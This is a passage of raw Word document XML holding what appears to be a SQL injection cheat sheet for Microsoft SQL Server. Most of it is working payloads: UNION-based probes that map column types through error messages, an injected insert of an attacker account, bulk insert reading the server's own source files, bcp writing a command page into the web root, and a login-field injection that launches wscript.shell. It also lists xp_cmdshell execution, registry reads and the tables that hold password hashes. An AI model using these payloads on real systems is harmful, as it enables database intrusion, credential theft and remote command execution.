      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>columntofind</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>) from </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (S)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Microsoft OLE DB Provider for ODBC Drivers error '80040e07' </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>varchar</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> data type as an argument.</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br/>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>If you are not getting an error it means </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>column is numeric.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5800057A" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Also you can use CAST() or CONVERT()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF10D5" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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 FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F958A5A" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</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No Error - Syntax is right. MS SQL Server Used. Proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E989C4" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</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No Error – First column is an integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585713C5" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Error! – Second column is not an integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E582A" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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lastRenderedPageBreak/>
        <w:t>11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-</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No Error – Second column is a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A916CE" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-</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Error! – Third column is not an integer. ... </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Microsoft OLE DB Provider for SQL Server error '80040e07' </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>Explicit conversion from data type </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> to image is not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DCA49E"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t>You'll get convert() errors before union target errors ! </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>So start with convert() then union</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A41BB1"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Simple Insert (MSO+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C7040F"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 insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3741D"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Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BA4D03"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t>@@version</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (MS) </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also, you can use insert, update statements or in functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232939B8"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INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F980236"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24" w:name="BulkInsert"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Bulk Insert (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599BE91"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Insert a file content to a table. If you don't know internal path of web application you can </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>read IIS (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>IIS 6 only</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) metabase file</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>%systemroot%\system32\inetsrv\MetaBase.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) and then search in it to identify application path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76307858" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Create table foo( line varchar(8000) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85C699" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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bulk insert foo from 'c:\inetpub\wwwroot\login.asp'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7320B485" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Drop temp table, and repeat for another file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA4375"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BCP (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBAC422"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Write text file. Login Credentials are required to use this function.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bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14032405"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VBS, WSH in SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57899B39"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You can use VBS, WSH scripting in SQL Server because of ActiveX support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514B784"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declare @o int </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_oacreate 'wscript.shell', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_oamethod @o, 'run', NULL, 'notepad.exe' </w:t>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i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D12CAE"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Executing system commands, xp_cmdshell (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABCE00"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Well known trick, By default it's disabled in </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL Server 2005. </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>You need to have admin access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AB814"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EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144CEA1"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Simple ping check (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>configure your firewall or sniffer to identify request before launch it</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7B786"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EXEC master.dbo.xp_cmdshell 'ping '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0882FF"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You can not read results directly from error or union or something else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77963904"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Some Special Tables in SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59163A20" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Error Messages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master..sysmessages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C0B837" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Linked Servers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master..sysservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3067E09C" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Password (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>2000 and 20005 both can be crackable, they use very similar hashing algorithm </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SQL Server 2000:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t> masters..sysxlogins</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SQL Server 2005 : </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>sys.sql_logins </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C209737"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More Stored Procedures for SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2955EAF4"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Cmd Execute (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_cmdshell</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exec master..xp_cmdshell 'dir'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023618A"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Registry Stuff (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_regread</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r>
    </w:p>
    <w:p w14:paraId="4861CF3D" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regaddmultistring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B582469" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regdeletekey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F79B466" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regdeletevalue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A8864" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regenumkeys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F4E48" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regenumvalues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620ACDA3" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537FC9DE" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regremovemultistring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687039D0" w14:textId="77777777" w:rsidR="007B3493" w:rsidRPr="007B3493" w:rsidRDefault="007B3493" w:rsidP="007B3493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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xp_regwrite </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:br/>
        <w:t>exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3466DD8B"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Managing Services (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_servicecontrol</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694DF66F"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Medias (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_availablemedia</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF3F177"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ODBC Resources (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_enumdsn</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8346B6"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Login mode (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_loginconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C7DED"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Creating Cab Files (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>xp_makecab</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB79D5A"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Domain Enumeration (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3493">
        <w:rPr>
